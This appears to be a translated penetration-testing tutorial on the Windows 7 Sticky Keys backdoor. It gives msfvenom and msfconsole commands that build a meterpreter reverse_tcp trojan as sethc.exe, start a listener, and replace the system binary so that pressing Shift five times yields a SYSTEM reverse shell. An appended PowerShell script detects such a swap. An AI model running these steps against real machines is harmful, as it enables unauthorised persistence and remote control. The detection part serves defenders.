Operating system: Windows 7 Ultimate

Tool: msfconsole on Kali Linux

Principle behind the privilege escalation (pressing Shift five times)

In Windows, pressing Shift five times triggers Sticky Keys, which is C:\Windows\System32\sethc.exe. If cmd.exe is renamed to sethc.exe and swapped in for the original Sticky Keys binary, then pressing Shift five times at the logon screen runs cmd.exe, and it runs with SYSTEM privileges.

Besides cmd.exe, other tools can also be used to replace sethc.exe.

Step 1: use msfconsole on Kali to generate the trojan

1. Open MSF
2. Select the exploit module
use exploit/multi/handler
3. Generate the trojan. lhost is your own IP and lport is your own port; the payload connects the shell back to that IP and port
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe -o sethc.exe
4. Because I opened the terminal from the desktop, the generated trojan file ends up in the user's home directory; open another terminal to check where the file is


Step 2: listen on the port and receive the reverse shell

1. Set the payload
set payload windows/meterpreter/reverse_tcp
2. Set the address the shell connects back to (your own IP)
set lhost
3. Set the port for the reverse connection
set lport 4444
4. Start listening


Step 3: replace sethc.exe

Upload the generated trojan to the c:/windows/system32 directory on the target host and replace the original sethc.exe.

The original sethc.exe cannot be modified or deleted directly; its permissions have to be changed first.


Step 4: press Shift five times to trigger sethc.exe and get the reverse shell

1. On the target host, press Shift five times to trigger sethc.exe. Nothing visible happens, because the program has been replaced.

2. Check the listener on Kali; type shell to get the target host's command line and run system commands.
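The same steps leave traces a defender can look for: a sethc.exe that is byte-identical to cmd.exe or lacks a Microsoft signature, a version resource that does not describe sethc.exe, an owner other than TrustedInstaller (step 3 requires taking ownership before the file can be replaced), and no matching copy in the WinSxS component store. The check below is added here and is not part of the original write-up; it assumes an elevated PowerShell 4 or later on the Windows host being inspected and changes nothing on the system.

```powershell
# Added integrity check for the Sticky Keys binary (sethc.exe).
# Assumes an elevated PowerShell 4+ session on the host being inspected.
$sethc = Join-Path $env:SystemRoot 'System32\sethc.exe'
$cmd   = Join-Path $env:SystemRoot 'System32\cmd.exe'
$findings = @()

# 1. The write-up renames cmd.exe to sethc.exe: identical hashes give it away.
$hSethc = (Get-FileHash -Algorithm SHA256 $sethc).Hash
$hCmd   = (Get-FileHash -Algorithm SHA256 $cmd).Hash
if ($hSethc -eq $hCmd) { $findings += 'sethc.exe is byte-identical to cmd.exe' }

# 2. A swapped or freshly built binary (msfvenom output) does not carry a
#    valid Microsoft Authenticode signature.
$sig = Get-AuthenticodeSignature $sethc
if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
    $findings += "sethc.exe signature status: $($sig.Status)"
}

# 3. The version resource of the real file names sethc.exe, not cmd.exe or nothing.
$vi = (Get-Item $sethc).VersionInfo
if ($vi.OriginalFilename -notmatch '^sethc\.exe$') {
    $findings += "OriginalFilename is '$($vi.OriginalFilename)'"
}

# 4. Replacing the file (step 3) requires taking ownership away from
#    TrustedInstaller; a changed owner is a strong indicator of tampering.
$owner = (Get-Acl $sethc).Owner
if ($owner -ne 'NT SERVICE\TrustedInstaller') {
    $findings += "owner is '$owner' (expected NT SERVICE\TrustedInstaller)"
}

# 5. The shipped sethc.exe is hard-linked from the WinSxS component store,
#    so a genuine file has a hash-identical copy there.
$sxsMatch = Get-ChildItem (Join-Path $env:SystemRoot 'WinSxS') -Recurse -Filter 'sethc.exe' -ErrorAction SilentlyContinue |
    Where-Object { (Get-FileHash -Algorithm SHA256 $_.FullName).Hash -eq $hSethc }
if (-not $sxsMatch) { $findings += 'no matching sethc.exe in the WinSxS component store' }

if ($findings) {
    Write-Warning 'sethc.exe looks tampered with:'
    $findings | ForEach-Object { Write-Warning "  - $_" }
} else {
    Write-Output 'sethc.exe passes all checks'
}
```

The WinSxS scan can take a while on a system with many updates installed; the first four checks alone are enough to flag the swap described above.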